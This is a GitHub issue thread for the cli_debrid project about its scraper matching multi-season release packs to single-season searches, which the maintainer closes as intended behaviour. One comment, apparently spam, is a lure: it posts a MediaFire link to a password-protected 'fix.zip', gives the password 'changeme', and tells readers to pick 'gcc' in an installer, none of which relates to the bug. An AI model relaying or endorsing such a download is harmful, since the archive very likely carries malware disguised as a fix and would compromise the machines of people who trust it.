### ISSUE TITLE
Scraper issue / title matching

### ISSUE THREAD

**Issue by mash2k3** [godver3/cli_debrid#160] opened 2024-08-27 22:18 UTC
The scraper gets confused when met with a release that has more than 1 season in a pack
For example showname.S01-S04 can either be selected for a season 1 scrape or a season 4 scrape
So you will end up with individual season packs 2-4 and 1-4 in a single pack resulting in double media for season 2-4

**Comment by cnhbliyou** [comment] 2024-08-28 04:56
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by godver3** [comment] 2024-09-03 06:14
This is a bit "as intended" - we want the best result even if it contains more than we are looking for, otherwise we would move to a worse result if it happens to contain more than we want. Closing for now.

**Closed by godver3** 2024-09-03 06:14 UTC
